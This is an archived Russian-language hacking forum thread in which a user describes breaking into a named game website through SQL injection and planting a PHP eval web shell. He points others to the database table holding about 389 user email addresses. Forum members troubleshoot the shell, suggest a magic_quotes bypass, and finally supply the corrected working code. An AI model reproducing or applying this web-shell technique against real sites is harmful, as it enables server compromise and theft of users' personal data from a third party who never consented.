Сломал сайт, залил Php файл, а ничё не работает! [Архив]

Просмотр полной версии : Сломал сайт, залил Php файл, а ничё не работает!

Ponchik

09.01.2007, 02:21

Хай! Вот нащёл сайт!
_http://jeux-mu-sacre-online.no-ip.org/
Нащёл в нём SQL Injection, выполнил команду
echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php
Файл создался, но...
http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123';
И ничего... В общем если кому удасться разобраться в чём проблема, раскажите :) А БД можете себе брать, тама MSSQL в
БД: MuOnline
Таблица: MEMB_INFO
Колонка: mail_addr
Хранятся мыльники юзверей (я так понимаю их тама только 389 :( )
В общем очень интересно где скривили мои руки, почему сервер не слушает меня :mad:

sunb0rn

09.01.2007, 02:43

А ты посмотри в сорсаx что делается ;) - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!!

}{0TT@БЬ)Ч

09.01.2007, 02:46

ссылку на саму sql Injection!В студию.

Ponchik

09.01.2007, 03:02

sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы...
Я так много раз делал, всё работало, а вот тут нехочет...

GreenBear

09.01.2007, 03:20

sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно.
Ponchik, посмотри код страницы) пхп не обрабатывается.

Ponchik

09.01.2007, 03:47

Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...

GreenBear

09.01.2007, 03:51

а так всё фурычит...
http://netsec.ru/uploads/green/vn4kidFbYwQIqU0snap085.jpg
не спорь ((=

Ponchik

09.01.2007, 04:04

Позволь поспорить
http://img177.imageshack.us/img177/3940/screenshot0pg1.jpg

GreenBear

09.01.2007, 04:06

я про сайт :d

max_pain89

09.01.2007, 04:16

если magic_quotes=on то нихуя работать не будет. Можно обойти например echo(chr(0x56))

Ponchik

09.01.2007, 04:23

Green_Bear, в смысле про сайт... Вот я на локалхосте проверил и показал!
max_pain89, ты про ' превращается в \' ? Для этого я юзаю stripslashes() он исправляет этот баг
Да и твой вариант всёравно не работает, бнсполезно я так понимаю пытаться, потому-что я и copy("шелл","Системный путь") проблвал, нефурычит! Странно...

TANZWUT

09.01.2007, 05:11

кароч понял что за фишка... у меня тож wamp стоял... долго не мог допереть почему мои скрипты так же не пашут =)))
оказываецо надо делать так <?php eval(stripslashes($_GET[c])); ?> ;)

Ponchik

09.01.2007, 05:22

Ёшкин кот! Ядрён батон! Работает! Спасибо!